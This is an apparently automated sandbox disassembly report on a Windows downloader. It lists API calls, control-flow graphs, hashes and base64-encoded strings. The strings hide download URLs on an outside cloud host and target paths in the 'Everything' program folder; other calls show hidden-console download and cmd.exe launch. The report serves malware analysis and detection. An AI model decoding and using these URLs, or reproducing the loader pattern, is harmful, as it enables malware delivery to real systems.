                                                                                • Part of subcall function 00ED2CB0: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00ED2DAC
                                                                                • Part of subcall function 00ED2CB0: InternetCloseHandle.WININET(00000000), ref: 00ED2DE6
                                                                                • Part of subcall function 00ED2CB0: InternetCloseHandle.WININET(00000000), ref: 00ED2E02
                                                                              • task.LIBCPMTD ref: 00ED2F47
                                                                              • task.LIBCPMTD ref: 00ED2F56
                                                                              • task.LIBCPMTD ref: 00ED2F97
                                                                              • task.LIBCPMTD ref: 00ED2FA6
                                                                              • task.LIBCPMTD ref: 00ED2FF6
                                                                              • task.LIBCPMTD ref: 00ED3008
                                                                              • task.LIBCPMTD ref: 00ED3058
                                                                              • task.LIBCPMTD ref: 00ED306A
                                                                              • task.LIBCPMTD ref: 00ED30BA
                                                                              • task.LIBCPMTD ref: 00ED30CC
                                                                              • task.LIBCPMTD ref: 00ED311C
                                                                              • task.LIBCPMTD ref: 00ED312E
                                                                              Strings
                                                                              • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS92Y3J1bnRpbWUxNDAuZGxs, xrefs: 00ED3024
                                                                              • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9QbHVnaW5MYXVuY2hlci5leGU=, xrefs: 00ED2F1F
                                                                              • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcjEyMC5kbGw=, xrefs: 00ED2FC2
                                                                              • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDE0MC5kbGw=, xrefs: 00ED3086
                                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTQwLmRsbA==, xrefs: 00ED306F
                                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTIwLmRsbA==, xrefs: 00ED2F5B
                                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHZjcnVudGltZTE0MC5kbGw=, xrefs: 00ED300D
                                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNyMTIwLmRsbA==, xrefs: 00ED2FAB
                                                                              • aHR0cHM6Ly93d3c4MC0xMzIzNTcwOTU5LmNvcy5hcC1zaW5nYXBvcmUubXlxY2xvdWQuY29tL01TQVNOMS5kbGw=, xrefs: 00ED30E8
                                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXEV2ZXJ5dGhpbmcuZXhl, xrefs: 00ED2F0B
                                                                              • aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDEyMC5kbGw=, xrefs: 00ED2F6F
                                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXGFwcF9jb3JlX2xlZ2FjeS5kbGw=, xrefs: 00ED30D1
                                                                              • C:\Program Files (x86)\Everything, xrefs: 00ED2F00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: task$Internet$CloseHandleOpen$CreateDirectoryFileRead
                                                                              • String ID: C:\Program Files (x86)\Everything$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXEV2ZXJ5dGhpbmcuZXhl$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTIwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTQwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNyMTIwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXGFwcF9jb3JlX2xlZ2FjeS5kbGw=$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHZjcnVudGltZTE0MC5kbGw=$aHR0cHM6Ly93d3c4MC0xMzIzNTcwOTU5LmNvcy5hcC1zaW5nYXBvcmUubXlxY2xvdWQuY29tL01TQVNOMS5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS92Y3J1bnRpbWUxNDAuZGxs$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9QbHVnaW5MYXVuY2hlci5leGU=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDE0MC5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcDEyMC5kbGw=$aHR0cHM6Ly93d3dkbGwtMTMyMzU3MDk1OS5jb3MuYXAtc2luZ2Fwb3JlLm15cWNsb3VkLmNvbS9tc3ZjcjEyMC5kbGw=
                                                                              • API String ID: 1727112427-3979013470
                                                                              • Opcode ID: 70a9c246538c575121b612c811ff9378ecc0194da8ed47391aa54a3d53c0adee
                                                                              • Instruction ID: d1205ac5575c2dfe60860ea66dfc17227f4ee52b94a0deb176f3176403c35e74
                                                                              • Opcode Fuzzy Hash: 70a9c246538c575121b612c811ff9378ecc0194da8ed47391aa54a3d53c0adee
                                                                              • Instruction Fuzzy Hash: 47513D72C12A09EADB14EBA0CD46BDDBBB4AF10301F9085D9E115372D2EB741F09DB91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 150 ef427e-ef42ae call ef3fcc 153 ef42c9-ef42d5 call eef212 150->153 154 ef42b0-ef42bb call ee1dd5 150->154 160 ef42ee-ef4337 call ef3f37 153->160 161 ef42d7-ef42ec call ee1dd5 call ee1de8 153->161 159 ef42bd-ef42c4 call ee1de8 154->159 170 ef45a3-ef45a7 159->170 168 ef4339-ef4342 160->168 169 ef43a4-ef43ad GetFileType 160->169 161->159 172 ef4379-ef439f GetLastError call ee1d8e 168->172 173 ef4344-ef4348 168->173 174 ef43af-ef43e0 GetLastError call ee1d8e CloseHandle 169->174 175 ef43f6-ef43f9 169->175 172->159 173->172 179 ef434a-ef4377 call ef3f37 173->179 174->159 189 ef43e6-ef43f1 call ee1de8 174->189 177 ef43fb-ef4400 175->177 178 ef4402-ef4408 175->178 182 ef440c-ef445a call eef15d 177->182 178->182 183 ef440a 178->183 179->169 179->172 193 ef445c-ef4468 call ef4146 182->193 194 ef4479-ef44a1 call ef3ce1 182->194 183->182 189->159 193->194 201 ef446a 193->201 199 ef44a6-ef44e7 194->199 200 ef44a3-ef44a4 194->200 203 ef44e9-ef44ed 199->203 204 ef4508-ef4516 199->204 202 ef446c-ef4474 call ee747f 200->202 201->202 202->170 203->204 205 ef44ef-ef4503 203->205 206 ef451c-ef4520 204->206 207 ef45a1 204->207 205->204 206->207 209 ef4522-ef4555 CloseHandle call ef3f37 206->209 207->170 213 ef4589-ef459d 209->213 214 ef4557-ef4583 GetLastError call ee1d8e call eef325 209->214 213->207 214->213
                                                                              APIs
                                                                                • Part of subcall function 00EF3F37: CreateFileW.KERNELBASE(00000000,?,?,'C,?,?,00000000,?,00EF4327,?,0000000C), ref: 00EF3F54
                                                                              • GetLastError.KERNEL32 ref: 00EF4392
                                                                              • __dosmaperr.LIBCMT ref: 00EF4399
                                                                              • GetFileType.KERNELBASE(00000000), ref: 00EF43A5
                                                                              • GetLastError.KERNEL32 ref: 00EF43AF
                                                                              • __dosmaperr.LIBCMT ref: 00EF43B8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00EF43D8
                                                                              • CloseHandle.KERNEL32(00EEACDF), ref: 00EF4525
                                                                              • GetLastError.KERNEL32 ref: 00EF4557
                                                                              • __dosmaperr.LIBCMT ref: 00EF455E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                              • String ID: H
                                                                              • API String ID: 4237864984-2852464175
                                                                              • Opcode ID: d26bd022e760527bfde212b938f28bf76afef4f6de2caf8266c1fa250c7135e0
                                                                              • Instruction ID: 23e9b938a4d650bc9e4f88d014ec30d702deb1fad37be36c18fa9fcbe683e3fe
                                                                              • Opcode Fuzzy Hash: d26bd022e760527bfde212b938f28bf76afef4f6de2caf8266c1fa250c7135e0
                                                                              • Instruction Fuzzy Hash: 5BA14072A1015C9FDF19AF68DC42BBE7BE0AB46324F141259F911FB2E1CB308956CB42

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00ED2CDB
                                                                                • Part of subcall function 00ED2B40: task.LIBCPMTD ref: 00ED2C92
                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00ED2D19
                                                                              • task.LIBCPMTD ref: 00ED2D25
                                                                              • task.LIBCPMTD ref: 00ED2D70
                                                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00ED2DAC
                                                                              • InternetCloseHandle.WININET(00000000), ref: 00ED2DE6
                                                                              • InternetCloseHandle.WININET(00000000), ref: 00ED2E02
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$task$CloseHandleOpen$FileRead
                                                                              • String ID: Mozilla/5.0
                                                                              • API String ID: 3809162015-2630049532
                                                                              • Opcode ID: 907ebe15de923c219d388daf0b55f3771776829d2b01a55be6bacf922d08cd08
                                                                              • Instruction ID: 862459a57a434781e5e241731a0a25e2d489afed42732bb43cf00777a6538d92
                                                                              • Opcode Fuzzy Hash: 907ebe15de923c219d388daf0b55f3771776829d2b01a55be6bacf922d08cd08
                                                                              • Instruction Fuzzy Hash: 5E415CB1900209AFDB14DF90DD86BEEB7B4EF54700F10425AF615BA2D1DB746A46CB90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 248 ee9ded-ee9dfd 249 ee9dff-ee9e12 call ee1dd5 call ee1de8 248->249 250 ee9e17-ee9e19 248->250 267 eea171 249->267 252 ee9e1f-ee9e25 250->252 253 eea159-eea166 call ee1dd5 call ee1de8 250->253 252->253 256 ee9e2b-ee9e54 252->256 272 eea16c call ee121d 253->272 256->253 259 ee9e5a-ee9e63 256->259 262 ee9e7d-ee9e7f 259->262 263 ee9e65-ee9e78 call ee1dd5 call ee1de8 259->263 265 eea155-eea157 262->265 266 ee9e85-ee9e89 262->266 263->272 269 eea174-eea177 265->269 266->265 271 ee9e8f-ee9e93 266->271 267->269 271->263 274 ee9e95-ee9eac 271->274 272->267 277 ee9eae-ee9eb1 274->277 278 ee9ee1-ee9ee7 274->278 281 ee9ed7-ee9edf 277->281 282 ee9eb3-ee9eb9 277->282 279 ee9ebb-ee9ed2 call ee1dd5 call ee1de8 call ee121d 278->279 280 ee9ee9-ee9ef0 278->280 311 eea08c 279->311 284 ee9ef4-ee9f12 call ee824e call ee7311 * 2 280->284 285 ee9ef2 280->285 283 ee9f54-ee9f73 281->283 282->279 282->281 287 eea02f-eea038 call ef1cf0 283->287 288 ee9f79-ee9f85 283->288 321 ee9f2f-ee9f52 call eea37e 284->321 322 ee9f14-ee9f2a call ee1de8 call ee1dd5 284->322 285->284 299 eea03a-eea04c 287->299 300 eea0a9 287->300 288->287 291 ee9f8b-ee9f8d 288->291 291->287 296 ee9f93-ee9fb4 291->296 296->287 301 ee9fb6-ee9fcc 296->301 299->300 305 eea04e-eea05d GetConsoleMode 299->305 308 eea0ad-eea0c3 ReadFile 300->308 301->287 306 ee9fce-ee9fd0 301->306 305->300 312 eea05f-eea063 305->312 306->287 313 ee9fd2-ee9ff5 306->313 309 eea0c5-eea0cb 308->309 310 eea121-eea12c GetLastError 308->310 309->310 317 eea0cd 309->317 315 eea12e-eea140 call ee1de8 call ee1dd5 310->315 316 eea145-eea148 310->316 319 eea08f-eea099 call ee7311 311->319 312->308 318 eea065-eea07d ReadConsoleW 312->318 313->287 320 ee9ff7-eea00d 313->320 315->311 328 eea14e-eea150 316->328 329 eea085-eea08b call ee1d8e 316->329 324 eea0d0-eea0e2 317->324 326 eea09e-eea0a7 318->326 327 eea07f GetLastError 318->327 319->269 320->287 331 eea00f-eea011 320->331 321->283 322->311 324->319 334 eea0e4-eea0e8 324->334 326->324 327->329 328->319 329->311 331->287 338 eea013-eea02a 331->338 341 eea0ea-eea0fa call ee9afe 334->341 342 eea101-eea10e 334->342 338->287 353 eea0fd-eea0ff 341->353 348 eea11a-eea11f call ee9944 342->348 349 eea110 call ee9c55 342->349 354 eea115-eea118 348->354 349->354 353->319 354->353
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 34e1513da631ac8b265df0c7fac9af79835d2516edd87589bca6c4b200ec44a3
                                                                              • Instruction ID: b2adca50b5baf533d5b5e00833dfa47dfdcc5030f51945db64378334e805620f
                                                                              • Opcode Fuzzy Hash: 34e1513da631ac8b265df0c7fac9af79835d2516edd87589bca6c4b200ec44a3
                                                                              • Instruction Fuzzy Hash: 0BB1D2B0A0428D9FDB11DFAAC841BBDBBF1AF45314F186168E505B7392C770A981CB62

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetConsoleWindow.KERNELBASE ref: 00ED34B4
                                                                              • ShowWindow.USER32(?,00000000), ref: 00ED34C3
                                                                              • Sleep.KERNELBASE(00007530), ref: 00ED34CE
                                                                                • Part of subcall function 00ED3150: Sleep.KERNELBASE(00000BB8,?,00EF7223,000000FF), ref: 00ED317C
                                                                                • Part of subcall function 00ED3150: InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 00ED319D
                                                                                • Part of subcall function 00ED3150: InternetOpenUrlA.WININET(00000000,00F0375C,00000000,00000000,80000000,00000000), ref: 00ED31DD
                                                                                • Part of subcall function 00ED3150: InternetCloseHandle.WININET(?), ref: 00ED320E
                                                                                • Part of subcall function 00ED3150: InternetCloseHandle.WININET(?), ref: 00ED3271
                                                                                • Part of subcall function 00ED3150: InternetCloseHandle.WININET(?), ref: 00ED327B
                                                                                • Part of subcall function 00ED3150: InternetReadFile.WININET(00000000,?,00001000,?), ref: 00ED329C
                                                                              • Sleep.KERNEL32(00000BB8), ref: 00ED34DE
                                                                                • Part of subcall function 00ED2E50: GetCurrentProcess.KERNEL32(00000100), ref: 00ED2E5E
                                                                                • Part of subcall function 00ED2E50: SetPriorityClass.KERNEL32(00000000), ref: 00ED2E65
                                                                                • Part of subcall function 00ED2E50: GetCurrentThread.KERNEL32 ref: 00ED2E6D
                                                                                • Part of subcall function 00ED2E50: SetThreadPriority.KERNEL32(00000000), ref: 00ED2E74
                                                                                • Part of subcall function 00ED2E50: SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 00ED2E88
                                                                                • Part of subcall function 00ED2E50: _fwprintf.LIBCONCRTD ref: 00ED2EA2
                                                                                • Part of subcall function 00ED2E50: ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00ED2EC1
                                                                                • Part of subcall function 00ED2E50: ExitProcess.KERNEL32 ref: 00ED2EC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$CloseHandleSleep$CurrentOpenPriorityProcessThreadWindow$ChangeClassConsoleExecuteExitFileNotifyReadShellShow_fwprintf
                                                                              • String ID:
                                                                              • API String ID: 96696892-0
                                                                              • Opcode ID: ffa76ca0d15c7579f9ef4a6824fb4c15c5478900ec21d814518ee3c88ee40980
                                                                              • Instruction ID: cae418bb2e0a8d7e849053ff17d0781d5317087d20bd83e47fac9b7e6da84c82
                                                                              • Opcode Fuzzy Hash: ffa76ca0d15c7579f9ef4a6824fb4c15c5478900ec21d814518ee3c88ee40980
                                                                              • Instruction Fuzzy Hash: 65E0CD30500708AFD7406BF1DE0B62D37A8EB44702F000155F705F12A0DE715904C751

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 361 ed3e50-ed3e5d 362 ed3e5f 361->362 363 ed3e70-ed3e77 361->363 366 ed3e67-ed3e6b 362->366 367 ed3e61-ed3e65 362->367 364 ed3e79-ed3e8d call ed4840 363->364 365 ed3e92-ed3eb3 call ed5fd0 363->365 370 ed3fa7-ed3faa 364->370 373 ed3eb5-ed3efc call ed3fb0 call ed6130 call ed6ba0 call ed60b0 365->373 374 ed3f01-ed3f08 365->374 366->370 367->363 367->366 373->374 376 ed3f0e-ed3f16 call ed5af0 374->376 377 ed3f98-ed3fa5 374->377 382 ed3f1d-ed3f24 376->382 377->370 384 ed3f26-ed3f5c call ee0b60 382->384 385 ed3f71-ed3f75 382->385 393 ed3f6f 384->393 394 ed3f5e-ed3f6d 384->394 385->377 388 ed3f77-ed3f88 call ee0b60 385->388 395 ed3f8d-ed3f95 388->395 393->382 394->370 395->377
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$Min_value
                                                                              • String ID:
                                                                              • API String ID: 3100174245-0
                                                                              • Opcode ID: 3c3749919c9a63ec5bd6beb19ce55b8a7d9094cc88d032b5d89156b829ee7930
                                                                              • Instruction ID: b6695a82091577d6b820d4860dd42ac5a1ab4554ac2a7c5dd59cb3e57531cc2b
                                                                              • Opcode Fuzzy Hash: 3c3749919c9a63ec5bd6beb19ce55b8a7d9094cc88d032b5d89156b829ee7930
                                                                              • Instruction Fuzzy Hash: 7C51D775E0020DEFCB08DFA8C894AEEB7B2EF88304F10916AE915A7345D770AB45DB51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 396 ee91f2-ee91ff 397 ee9229-ee923d call ee5c52 396->397 398 ee9201-ee9224 call ee11a0 396->398 404 ee923f 397->404 405 ee9242-ee924b call eea360 397->405 403 ee9390-ee9392 398->403 404->405 407 ee9250-ee925f 405->407 408 ee926f-ee9278 407->408 409 ee9261 407->409 412 ee928c-ee92c0 408->412 413 ee927a-ee9287 408->413 410 ee9339-ee933e 409->410 411 ee9267-ee9269 409->411 414 ee938e-ee938f 410->414 411->408 411->410 416 ee931d-ee9329 412->416 417 ee92c2-ee92cc 412->417 415 ee938c 413->415 414->403 415->414 418 ee932b-ee9332 416->418 419 ee9340-ee9343 416->419 420 ee92ce-ee92da 417->420 421 ee92f3-ee92ff 417->421 418->410 423 ee9346-ee934e 419->423 420->421 424 ee92dc-ee92ee call ee955e 420->424 421->419 422 ee9301-ee931b call ee9709 421->422 422->423 427 ee938a 423->427 428 ee9350-ee9356 423->428 424->414 427->415 431 ee936e-ee9372 428->431 432 ee9358-ee936c call ee9393 428->432 433 ee9374-ee9382 call ef6a20 431->433 434 ee9385-ee9387 431->434 432->414 433->434 434->427
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <
                                                                              • API String ID: 0-2776746311
                                                                              • Opcode ID: 32fb86a629791c485fa974097c04bff106b8c134cd0c9a4dfdb97ea37cb02bbe
                                                                              • Instruction ID: 31e0c1465622cc7fa2f6c14ac095adf599bc78d8c85ca70146f3fbd338f9d421
                                                                              • Opcode Fuzzy Hash: 32fb86a629791c485fa974097c04bff106b8c134cd0c9a4dfdb97ea37cb02bbe
                                                                              • Instruction Fuzzy Hash: 9551C370A0024CEFDF14DF59C881AADBBE1EF89364F259159F849AB293D3319E41CB90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 439 ed2b40-ed2b9e call ed5290 call ed4e80 call ed4e40 446 ed2ba9-ed2bad 439->446 447 ed2baf-ed2bc7 call ed4e00 446->447 448 ed2bc9-ed2bf3 call ed4f80 call ed5090 446->448 447->446 456 ed2bfe-ed2c04 448->456 457 ed2c67-ed2ca8 call ed5130 call ed4e20 call ed5110 456->457 458 ed2c06-ed2c1e call ed4e00 456->458 464 ed2c20 458->464 465 ed2c22-ed2c43 call ed4e00 458->465 464->457 471 ed2c65 465->471 472 ed2c45-ed2c62 call ed4fa0 465->472 471->456 472->471
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: task
                                                                              • String ID: @
                                                                              • API String ID: 1384045349-2766056989
                                                                              • Opcode ID: f6614dfa00d24dff0cb34bb07e763dfe9b97a4e509c0ef97ded55b7b9f803877
                                                                              • Instruction ID: 3312be25279e1b41b13e229e4cac1c117ce217ad69fb32ad36460b3f1258737d
                                                                              • Opcode Fuzzy Hash: f6614dfa00d24dff0cb34bb07e763dfe9b97a4e509c0ef97ded55b7b9f803877
                                                                              • Instruction Fuzzy Hash: FC413DB1D00549DFCB04DF94D991AEEBBB4FF54310F24925AE5227B391DB342A06CBA0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 476 ed7db0-ed7def call ed1540 479 ed7e3c-ed7e51 call ed1520 476->479 480 ed7df1-ed7df8 call ed8680 476->480 484 ed7dfd-ed7e37 call ed86b0 call ed82b0 480->484 484->479
                                                                              APIs
                                                                              • Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 00ED7E37
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Concurrency::cancellation_token_source::~cancellation_token_source
                                                                              • String ID: jN
                                                                              • API String ID: 2028376226-441998628
                                                                              • Opcode ID: e807caf2cac7e5e9d48d971106de2187dd2ca0962f78cf92490e8ecbcfdbf051
                                                                              • Instruction ID: e712f63c8aac7492a1299da35ed7f63257c47f2e3b87920d3ca54253b0369900
                                                                              • Opcode Fuzzy Hash: e807caf2cac7e5e9d48d971106de2187dd2ca0962f78cf92490e8ecbcfdbf051
                                                                              • Instruction Fuzzy Hash: BB11D7B5D00209ABCB04DF98C951BAEBBB5EB48710F10825DE519B7390DB34AA41CBA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 488 ef3f37-ef3f5b CreateFileW
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,?,'C,?,?,00000000,?,00EF4327,?,0000000C), ref: 00EF3F54
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
